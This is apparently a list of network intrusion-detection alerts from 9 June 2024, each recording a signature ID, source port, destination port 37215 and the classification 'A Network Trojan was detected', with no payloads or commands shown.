          Timestamp:06/09/24-16:33:15.222847
          SID:2835222
          Source Port:39454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.031828
          SID:2829579
          Source Port:46578
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.951584
          SID:2829579
          Source Port:52284
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.399299
          SID:2835222
          Source Port:43770
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.104399
          SID:2835222
          Source Port:59736
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.719352
          SID:2835222
          Source Port:58720
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.035642
          SID:2835222
          Source Port:60532
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.869683
          SID:2835222
          Source Port:60252
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.823428
          SID:2835222
          Source Port:37228
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.993189
          SID:2829579
          Source Port:43516
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.417629
          SID:2835222
          Source Port:59234
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.605613
          SID:2835222
          Source Port:35268
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.540256
          SID:2829579
          Source Port:36856
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.996679
          SID:2835222
          Source Port:55412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.687606
          SID:2835222
          Source Port:50546
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.010906
          SID:2829579
          Source Port:34728
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.246548
          SID:2829579
          Source Port:37972
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.540296
          SID:2835222
          Source Port:43426
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.162043
          SID:2835222
          Source Port:40592
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.905388
          SID:2835222
          Source Port:53526
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.644889
          SID:2829579
          Source Port:45148
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.241794
          SID:2829579
          Source Port:45260
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.105327
          SID:2835222
          Source Port:57770
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.917781
          SID:2835222
          Source Port:37680
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.226186
          SID:2829579
          Source Port:52384
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.398508
          SID:2829579
          Source Port:49630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.033269
          SID:2835222
          Source Port:60442
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.820974
          SID:2835222
          Source Port:50326
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.084769
          SID:2835222
          Source Port:60344
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.397855
          SID:2835222
          Source Port:56524
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719993
          SID:2829579
          Source Port:57280
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.283623
          SID:2829579
          Source Port:49540
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.164220
          SID:2829579
          Source Port:52092
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928750
          SID:2829579
          Source Port:36234
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.030334
          SID:2835222
          Source Port:46576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.465597
          SID:2829579
          Source Port:44094
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.039077
          SID:2835222
          Source Port:47666
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.224277
          SID:2829579
          Source Port:58078
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.162461
          SID:2835222
          Source Port:51964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.720682
          SID:2829579
          Source Port:53122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.418742
          SID:2835222
          Source Port:38310
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.687321
          SID:2835222
          Source Port:40208
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.473795
          SID:2829579
          Source Port:60162
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.988767
          SID:2835222
          Source Port:35020
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.207483
          SID:2829579
          Source Port:48164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.914137
          SID:2835222
          Source Port:51134
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.284748
          SID:2829579
          Source Port:43294
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.288605
          SID:2829579
          Source Port:49128
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719258
          SID:2835222
          Source Port:35972
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.539420
          SID:2829579
          Source Port:50956
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.287141
          SID:2829579
          Source Port:49864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.724289
          SID:2835222
          Source Port:47362
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.148183
          SID:2835222
          Source Port:55052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.418011
          SID:2829579
          Source Port:55104
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.987841
          SID:2829579
          Source Port:45482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.161074
          SID:2835222
          Source Port:52024
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.033351
          SID:2829579
          Source Port:52268
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.033935
          SID:2835222
          Source Port:49640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.283267
          SID:2829579
          Source Port:45430
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.557992
          SID:2835222
          Source Port:39214
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.290146
          SID:2835222
          Source Port:51748
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.014205
          SID:2835222
          Source Port:51170
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.162849
          SID:2829579
          Source Port:57312
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.860619
          SID:2829579
          Source Port:52430
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.157378
          SID:2829579
          Source Port:42746
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.647248
          SID:2835222
          Source Port:49822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.947132
          SID:2829579
          Source Port:57980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.166399
          SID:2829579
          Source Port:55776
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.987820
          SID:2835222
          Source Port:60538
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.993353
          SID:2835222
          Source Port:47366
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.823153
          SID:2835222
          Source Port:42962
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.286646
          SID:2829579
          Source Port:55668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.989671
          SID:2829579
          Source Port:43808
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.037261
          SID:2835222
          Source Port:41048
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.676164
          SID:2829579
          Source Port:57072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.720507
          SID:2829579
          Source Port:42302
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.922215
          SID:2829579
          Source Port:44090
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.917873
          SID:2829579
          Source Port:43020
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.539515
          SID:2829579
          Source Port:53184
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.035173
          SID:2829579
          Source Port:40198
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.677481
          SID:2835222
          Source Port:48974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.910736
          SID:2835222
          Source Port:41152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.914486
          SID:2829579
          Source Port:41788
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.676375
          SID:2835222
          Source Port:42496
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.288335
          SID:2829579
          Source Port:34624
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.861977
          SID:2829579
          Source Port:42694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.400181
          SID:2829579
          Source Port:51664
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.283810
          SID:2835222
          Source Port:34402
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.287446
          SID:2835222
          Source Port:48772
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.567582
          SID:2835222
          Source Port:35302
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.471145
          SID:2835222
          Source Port:40966
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.991783
          SID:2829579
          Source Port:41354
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.157285
          SID:2829579
          Source Port:44962
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.166461
          SID:2835222
          Source Port:44286
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.399190
          SID:2829579
          Source Port:52114
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.643948
          SID:2835222
          Source Port:47084
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.714350
          SID:2835222
          Source Port:44118
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.558960
          SID:2835222
          Source Port:43004
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.538944
          SID:2835222
          Source Port:34910
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.986456
          SID:2829579
          Source Port:42240
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.916958
          SID:2835222
          Source Port:54828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.632601
          SID:2829579
          Source Port:33192
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.244280
          SID:2829579
          Source Port:38772
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.165148
          SID:2829579
          Source Port:57070
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.946658
          SID:2835222
          Source Port:45430
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.566377
          SID:2835222
          Source Port:44422
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.226042
          SID:2829579
          Source Port:58548
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.206680
          SID:2829579
          Source Port:43626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.396150
          SID:2829579
          Source Port:47202
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.606050
          SID:2835222
          Source Port:33822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.945852
          SID:2835222
          Source Port:50152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.285663
          SID:2835222
          Source Port:41182
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.922170
          SID:2835222
          Source Port:36992
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.989365
          SID:2835222
          Source Port:44138
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.076624
          SID:2835222
          Source Port:59348
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.476005
          SID:2829579
          Source Port:57042
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718561
          SID:2829579
          Source Port:52364
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.892545
          SID:2829579
          Source Port:40824
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.230596
          SID:2829579
          Source Port:58830
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.285438
          SID:2835222
          Source Port:51010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.467764
          SID:2829579
          Source Port:39458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.923736
          SID:2829579
          Source Port:54954
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.163382
          SID:2829579
          Source Port:49008
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.396071
          SID:2835222
          Source Port:33294
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.080402
          SID:2835222
          Source Port:50412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718588
          SID:2829579
          Source Port:38672
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.159996
          SID:2829579
          Source Port:60984
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.400196
          SID:2829579
          Source Port:39404
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.225945
          SID:2835222
          Source Port:53376
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.034292
          SID:2835222
          Source Port:58686
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.415415
          SID:2829579
          Source Port:48002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.396153
          SID:2829579
          Source Port:35718
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.298860
          SID:2829579
          Source Port:56060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.540187
          SID:2829579
          Source Port:41112
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.947710
          SID:2835222
          Source Port:52650
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.860718
          SID:2829579
          Source Port:42882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.278767
          SID:2829579
          Source Port:46272
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.226199
          SID:2829579
          Source Port:49888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.290518
          SID:2835222
          Source Port:51598
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929933
          SID:2835222
          Source Port:59556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.468819
          SID:2829579
          Source Port:39302
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.822976
          SID:2835222
          Source Port:49712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.160951
          SID:2835222
          Source Port:54962
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929090
          SID:2835222
          Source Port:39156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.944993
          SID:2835222
          Source Port:44182
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.714471
          SID:2829579
          Source Port:59078
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.919563
          SID:2835222
          Source Port:53150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.987168
          SID:2835222
          Source Port:50222
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.922005
          SID:2829579
          Source Port:44040
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928059
          SID:2829579
          Source Port:40834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.414282
          SID:2829579
          Source Port:48692
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.869384
          SID:2829579
          Source Port:44628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.248057
          SID:2835222
          Source Port:34950
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.289567
          SID:2829579
          Source Port:33304
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.028855
          SID:2835222
          Source Port:39220
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.227515
          SID:2829579
          Source Port:53300
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.718800
          SID:2829579
          Source Port:33668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.168681
          SID:2835222
          Source Port:54978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.900053
          SID:2829579
          Source Port:56136
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.082296
          SID:2835222
          Source Port:53212
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.073871
          SID:2835222
          Source Port:33166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.413535
          SID:2835222
          Source Port:33964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.475902
          SID:2829579
          Source Port:57402
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.867382
          SID:2829579
          Source Port:42374
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.289043
          SID:2835222
          Source Port:33056
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.077795
          SID:2835222
          Source Port:45140
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.819762
          SID:2835222
          Source Port:58028
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.224309
          SID:2829579
          Source Port:56052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.561878
          SID:2829579
          Source Port:49178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929502
          SID:2829579
          Source Port:55360
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.595082
          SID:2829579
          Source Port:33148
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.671647
          SID:2835222
          Source Port:38988
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.563166
          SID:2835222
          Source Port:54372
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.274858
          SID:2829579
          Source Port:40424
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.985340
          SID:2829579
          Source Port:60300
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.946789
          SID:2829579
          Source Port:55828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.568295
          SID:2835222
          Source Port:36052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.914528
          SID:2835222
          Source Port:35906
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.944513
          SID:2829579
          Source Port:37026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.133026
          SID:2829579
          Source Port:43938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.079366
          SID:2829579
          Source Port:57048
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.165134
          SID:2829579
          Source Port:42586
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.821306
          SID:2829579
          Source Port:32984
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.540144
          SID:2835222
          Source Port:46108
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.290475
          SID:2835222
          Source Port:50234
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.077902
          SID:2829579
          Source Port:56450
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.207741
          SID:2829579
          Source Port:39954
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.561731
          SID:2829579
          Source Port:51212
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.296466
          SID:2835222
          Source Port:60572
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.034731
          SID:2835222
          Source Port:42940
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.477537
          SID:2835222
          Source Port:51978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.667903
          SID:2835222
          Source Port:59732
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.226899
          SID:2835222
          Source Port:44534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.246649
          SID:2835222
          Source Port:37560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.031803
          SID:2835222
          Source Port:41344
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.286668
          SID:2829579
          Source Port:49934
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.226998
          SID:2829579
          Source Port:56448
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.275757
